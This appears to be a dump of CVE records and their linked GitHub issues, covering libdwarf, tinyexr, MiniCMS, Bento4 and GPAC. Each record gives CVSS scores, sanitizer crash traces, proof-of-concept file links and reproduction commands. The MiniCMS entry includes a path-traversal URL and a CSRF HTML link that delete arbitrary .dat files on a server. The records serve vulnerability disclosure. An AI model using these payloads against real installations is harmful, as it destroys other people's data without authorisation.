alt="image-20220610103719657" src="https://user-images.githubusercontent.com/30547070/172980438-354b34ac-7b83-469f-bf6c-14382bbd82f1.png">
SQL injection vulnerability exists in JFinal CMS 5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/38/comments
0
2022-06-10T02:49:09Z
2022-06-14T20:59:46Z
https://github.com/jflyfox/jfinal_cms/issues/38
1,266,938,033
38
3,786
CVE-2022-34299
2022-06-23T17:15:18.410
There is a heap-based buffer over-read in libdwarf 0.4.0. This issue is related to dwarf_global_formref_b.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/davea42/libdwarf-code/commit/7ef09e1fc9ba07653dd078edb2408631c7969162" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/davea42/libdwarf-code/issues/119" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/davea42/libdwarf-code/commit/7ef09e1fc9ba07653dd078edb2408631c7969162" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/davea42/libdwarf-code/issues/119" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libdwarf_project:libdwarf:0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "448D8623-0083-42B9-A9D1-60A5BF2F6DE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/davea42/libdwarf-code/issues/119
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "davea42", "libdwarf-code" ]
asan output: ``` ================================================================= ==3946410==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b000000697 at pc 0x0000005d9f2d bp 0x7fffffff94f0 sp 0x7fffffff94e8 READ of size 8 at 0x61b000000697 thread T0 #0 0x5d9f2c in dwarf_global_formref_b /libdwarf/SRC/src/lib/libdwarf/dwarf_form.c:840:9 #1 0x5d87b4 in dwarf_global_formref /libdwarf/SRC/src/lib/libdwarf/dwarf_form.c:671:11 #2 0x54c86e in dd_get_integer_and_name /libdwarf/SRC/src/bin/dwarfdump/print_die.c:2400:20 #3 0x546d08 in print_attribute /libdwarf/SRC/src/bin/dwarfdump/print_die.c:3981:15 #4 0x54464a in print_one_die /libdwarf/SRC/src/bin/dwarfdump/print_die.c:2290:25 #5 0x55a11d in print_die_and_children_internal /libdwarf/SRC/src/bin/dwarfdump/print_die.c:1632:21 #6 0x540f23 in print_die_and_children /libdwarf/SRC/src/bin/dwarfdump/print_die.c:954:11 #7 0x540f23 in print_one_die_section /libdwarf/SRC/src/bin/dwarfdump/print_die.c:1283:28 #8 0x540f23 in print_infos /libdwarf/SRC/src/bin/dwarfdump/print_die.c:648:12 #9 0x50b925 in process_one_file /libdwarf/SRC/src/bin/dwarfdump/dwarfdump.c:1001:15 #10 0x5099ec in main /libdwarf/SRC/src/bin/dwarfdump/dwarfdump.c:503:9 #11 0x7ffff7bfb082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x42848d in _start (/libdwarf/fuzzrun/dwarfdump+0x42848d) 0x61b000000697 is located 5 bytes to the right of 1554-byte region [0x61b000000080,0x61b000000692) allocated by thread T0 here: #0 0x4cd59f in malloc /fuzz/fuzzdeps/llvm-project-11.0.0/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3 #1 0x6a3554 in elf_load_nolibelf_section /libdwarf/SRC/src/lib/libdwarf/dwarf_elfread.c:229:26 SUMMARY: AddressSanitizer: heap-buffer-overflow /libdwarf/SRC/src/lib/libdwarf/dwarf_form.c:840:9 in dwarf_global_formref_b Shadow bytes around the buggy address: 0x0c367fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff80a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff80c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fff80d0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3946410==ABORTING ``` poc: [poc.zip](https://github.com/davea42/libdwarf-code/files/8909309/poc.zip) repro: ``` dwarfdump -vv -a ./poc ```
heap overflow in dwarf_global_formref_b
https://api.github.com/repos/davea42/libdwarf-code/issues/119/comments
1
2022-06-15T12:36:15Z
2022-06-16T00:08:41Z
https://github.com/davea42/libdwarf-code/issues/119
1,272,170,737
119
3,787
CVE-2022-34300
2022-06-23T17:15:18.460
In tinyexr 1.0.1, there is a heap-based buffer over-read in tinyexr::DecodePixelData.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/167" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HSGENQ3UEQ6QEKW45FLZFGXPCD5IHXFM/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I4YMGAN6AV4H4HPDINUHBKX7XE4T5THF/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JFCXR2EJGIE24DV45AWX6JJM7RQAT5CY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQCZL36LTOHWCQ25R5WTRSD5QMM436Q6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/167" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HSGENQ3UEQ6QEKW45FLZFGXPCD5IHXFM/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I4YMGAN6AV4H4HPDINUHBKX7XE4T5THF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JFCXR2EJGIE24DV45AWX6JJM7RQAT5CY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQCZL36LTOHWCQ25R5WTRSD5QMM436Q6/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinyexr_project:tinyexr:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "C2BE6DA6-577F-4392-9F51-7BB9A0782440", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/syoyo/tinyexr/issues/167
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "syoyo", "tinyexr" ]
## desc There is a heap based buffer overflow in tinyexr::DecodePixelData before 20220506 that could cause remote code execution depending on the usage of this program. ## asan output ``` ==2363537==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x629000009210 at pc 0x000000563bd4 bp 0x7fffffffc4b0 sp 0x7fffffffc4a8 READ of size 1 at 0x629000009210 thread T0 #0 0x563bd3 in tinyexr::cpy4(float*, float const*) /tinyexr/./BUILD/tinyexr.h:759:12 #1 0x563bd3 in tinyexr::DecodePixelData(unsigned char**, int const*, unsigned char const*, unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, TEXRAttribute const*, unsigned long, TEXRChannelInfo const*, std::vector<unsigned long, std::allocator<unsigned long> > const&) /tinyexr/./BUILD/tinyexr.h:3593:13 #2 0x505f79 in tinyexr::DecodeTiledPixelData(unsigned char**, int*, int*, int const*, unsigned char const*, unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, TEXRAttribute const*, unsigned long, TEXRChannelInfo const*, std::vector<unsigned long, std::allocator<unsigned long> > const&) /tinyexr/./BUILD/tinyexr.h:4115:10 #3 0x505f79 in tinyexr::DecodeTiledLevel(TEXRImage*, TEXRHeader const*, tinyexr::OffsetData const&, std::vector<unsigned long, std::allocator<unsigned long> > const&, int, unsigned char const*, unsigned long, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /tinyexr/./BUILD/tinyexr.h:4841:16 #4 0x504abc in tinyexr::DecodeChunk(TEXRImage*, TEXRHeader const*, tinyexr::OffsetData const&, unsigned char const*, unsigned long, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /tinyexr/./BUILD/tinyexr.h:5015:19 #5 0x519246 in tinyexr::DecodeEXRImage(TEXRImage*, TEXRHeader const*, unsigned char const*, unsigned char const*, unsigned long, char const**) /tinyexr/./BUILD/tinyexr.h:5756:15 #6 0x519246 in LoadEXRImageFromMemory /tinyexr/./BUILD/tinyexr.h:6444:10 #7 0x53f3bf in LLVMFuzzerTestOneInput /tinyexr/./SRC/test/fuzzer/fuzz.cc:20:9 #8 0x4fbaad in fuzzfile(char*) /tinyexr/../../../harness/aflharness.cc:35:5 #9 0x4fbc06 in main /tinyexr/../../../harness/aflharness.cc:52:13 #10 0x7ffff7a51082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x41e65d in _start (/tinyexr/fuzzrun/harness+0x41e65d) 0x629000009210 is located 0 bytes to the right of 16400-byte region [0x629000005200,0x629000009210) allocated by thread T0 here: #0 0x4f8c17 in operator new(unsigned long) /fuzz/fuzzdeps/llvm-project-11.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:99:3 #1 0x55b2b2 in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/ext/new_allocator.h:114:27 #2 0x55b2b2 in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/alloc_traits.h:443:20 #3 0x55b2b2 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:343:20 #4 0x55b2b2 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:358:33 #5 0x55b2b2 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_Vector_base(unsigned long, std::allocator<unsigned char> const&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:302:9 #6 0x55b2b2 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:508:9 #7 0x55b2b2 in tinyexr::DecodePixelData(unsigned char**, int const*, unsigned char const*, unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, TEXRAttribute const*, unsigned long, TEXRChannelInfo const*, std::vector<unsigned long, std::allocator<unsigned long> > const&) /tinyexr/./BUILD/tinyexr.h:3484:32 #8 0x505f79 in tinyexr::DecodeTiledPixelData(unsigned char**, int*, int*, int const*, unsigned char const*, unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, TEXRAttribute const*, unsigned long, TEXRChannelInfo const*, std::vector<unsigned long, std::allocator<unsigned long> > const&) /tinyexr/./BUILD/tinyexr.h:4115:10 #9 0x505f79 in tinyexr::DecodeTiledLevel(TEXRImage*, TEXRHeader const*, tinyexr::OffsetData const&, std::vector<unsigned long, std::allocator<unsigned long> > const&, int, unsigned char const*, unsigned long, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >*) /tinyexr/./BUILD/tinyexr.h:4841:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /tinyexr/./BUILD/tinyexr.h:759:12 in tinyexr::cpy4(float*, float const*) Shadow bytes around the buggy address: 0x0c527fff91f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff9200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff9210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff9220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff9230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c527fff9240: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2363537==ABORTING ``` ## reproduce * compile this project using address sanitizer * run `./test/fuzzer ./poc`
heap overflow in tinyexr::DecodePixelData
https://api.github.com/repos/syoyo/tinyexr/issues/167/comments
8
2022-06-14T16:06:34Z
2022-06-28T10:56:54Z
https://github.com/syoyo/tinyexr/issues/167
1,271,032,557
167
3,788
CVE-2022-33121
2022-06-24T21:15:08.357
A Cross-Site Request Forgery (CSRF) in MiniCMS v1.11 allows attackers to arbitrarily delete local .dat files via clicking on a malicious link.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/45" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:1234n:minicms:1.11:*:*:*:*:*:*:*", "matchCriteriaId": "EFF126BA-FB8A-4D2A-8B51-D19BF0F8C301", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/bg5sbk/MiniCMS/issues/45
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bg5sbk", "MiniCMS" ]
Software Link : https://github.com/bg5sbk/MiniCMS After the installation is complete, log in as administrator, open the page In post.php, user can delete any local .dat files without filter [![XgVxl6.png](https://s1.ax1x.com/2022/06/11/XgVxl6.png)](https://imgtu.com/i/XgVxl6) Create 1.dat in the parent directory [![XgZ9mD.png](https://s1.ax1x.com/2022/06/11/XgZ9mD.png)](https://imgtu.com/i/XgZ9mD) To delete 1.dat, the url is like http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag= Also you can delete any .dat file like local google chrome file [![XgZPTH.png](https://s1.ax1x.com/2022/06/11/XgZPTH.png)](https://imgtu.com/i/XgZPTH) http://127.0.0.1:80/MiniCMS-master/mc-admin/page.php?delete=../../../../../../../../opt/google/chrome/icudtl&state=delete&date=&tag= Here is CSRF POC test.html: Log in and click the link in test.html, modify the parameter of delete and users will delete the .dat file in the specified directory at last. ```Plaintext <a href="http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=">click</a> ```
There is CSRF vulnerabilities that can lead to deleting local .dat files
https://api.github.com/repos/bg5sbk/MiniCMS/issues/45/comments
3
2022-06-11T12:37:22Z
2024-09-06T05:43:24Z
https://github.com/bg5sbk/MiniCMS/issues/45
1,268,263,919
45
3,789
CVE-2021-40941
2022-06-27T18:15:08.803
In Bento4 1.6.0-638, there is an allocator is out of memory in the function AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity in Ap4Array.h:172, as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/644" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/644" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-638:*:*:*:*:*:*:*", "matchCriteriaId": "2122DA5E-A523-4D07-B017-982DF2B8B829", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/axiomatic-systems/Bento4/issues/644
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
How to reproduce: ``` 1.check out latest code, 5922ba762a 2.compile with asan, set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address -g") set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") 3.run ./mp4dump --verbosity 3 --format text poc1 ``` [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/7043113/poc1.zip) You can see the asan information below: ``` ==634578==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x8000000f0 bytes #0 0x34eabd in operator new(unsigned long) (/home/lly/pro/Bento4/cmakebuild/mp4dump+0x34eabd) #1 0x54535c in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /home/lly/pro/Bento4/Source/C++/Core/Ap4Array.h:172:25 #2 0x54535c in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /home/lly/pro/Bento4/Source/C++/Core/Ap4Array.h:210:25 #3 0x54535c in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/lly/pro/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:127:15 #4 0x5445a4 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /home/lly/pro/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51:16 #5 0x37cc25 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438:20 #6 0x383d06 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #7 0x3a062f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #8 0x39f40a in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #9 0x39f40a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #10 0x37c5ac in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #11 0x383d06 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #12 0x3a062f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #13 0x39f40a in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #14 0x39f40a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #15 0x37c5ac in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #16 0x383d06 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #17 0x38333b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #18 0x359a7e in main /home/lly/pro/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:342:25 #19 0x7f6cf702a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 ```
allocator is out of memory in Ap4Array.h:172
https://api.github.com/repos/axiomatic-systems/Bento4/issues/644/comments
0
2021-08-25T02:03:31Z
2021-09-08T02:36:45Z
https://github.com/axiomatic-systems/Bento4/issues/644
978,628,921
644
3,790
CVE-2021-40942
2022-06-27T21:15:07.900
In GPAC MP4Box v1.1.0, there is a heap-buffer-overflow in the function filter_parse_dyn_args function in filter_core/filter.c:1454, as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1908" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1908" } ]
